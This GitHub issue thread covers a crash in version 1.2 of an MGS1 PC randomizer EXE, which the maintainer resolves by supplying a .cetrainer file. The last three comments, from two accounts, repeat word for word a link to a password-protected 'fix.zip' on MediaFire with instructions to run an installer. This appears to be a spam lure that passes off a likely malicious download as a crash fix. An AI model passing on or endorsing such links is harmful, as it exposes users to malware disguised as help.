### ISSUE TITLE
Randomizer 1.2 EXE crashes game after pressing "Randomize" button

### ISSUE THREAD

**Issue by HeyItsLollie** [Great0ne/MGS1-PC-Randomizer#2]
Unfortunately, the crash happens so fast that there's no error message. Previous versions of the randomizer worked.

**Comment by Great0ne** [comment]
Weird, I just downloaded it and tested it without crash, maybe the cheatengine update on my side, could also be the game that must be used with the latest GOG update, will search.

**Comment by Great0ne** [comment]
Added a Randomizer 1.2 TEST EXE with some libraries included but I doubt this is the crash reason

**Comment by HeyItsLollie** [comment]
No luck, but I was finally able to catch an error message! It disappears _immediately_ after it shows, and sometimes the error is too slow to appear before it terminates, so I have no way of pressing any of these buttons.
![vlc - 2024-07-26 - 13-32-48](https://github.com/user-attachments/assets/28814bae-9b88-4bbd-8638-1ffc81c0e98e)

**Comment by Great0ne** [comment]
Ok, thanks for that, I checked every allocations and there shouldn't be a problem, also antivirus or not running in admin could block the program, thanks for the info I'll dig more

**Comment by Great0ne** [comment]
Added a MGS1 RANDOMIZER NO ALERT SNEEZE file, which take out alert/sneeze things, so the only difference with earlier versions is the sliders and drop chance, but I still doubt it is what messes up

**Comment by HeyItsLollie** [comment]
No dice, none of those changes seem to be the issue, just the same error and instant crash.

I've also tried:
- Making sure that Windows isn't trying to block or quarantine the .exe
- Reinstalling a fresh copy of MGS through GOG Galaxy
- Made sure that MGS is installed outside of Program Files
- Running the randomizer in admin mode, just in case

The only other thing I can think of is to try exporting a .cetrainer instead of an .exe, if that's possible?

**Comment by Great0ne** [comment]
Ok, well I thought before about uploading a trainer too so it could help, I will soon, just need to arrange and clean code maybe it will help, thanks nonetheless

**Comment by Great0ne** [comment]
Just uploaded a .cetrainer file, waiting for response, if it doesn't work I'll upload directly the cheat table

**Comment by HeyItsLollie** [comment]
Good news, the .cetrainer works! Even turned up the sneeze & alert effects just to check, and it's all working without issues. Thank you!

**Comment by Great0ne** [comment]
Very glad to hear that, I'll upload also a .cetrainer from now on, thanks a lot for testing and posting issues, hope it works well on your side, have fun

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
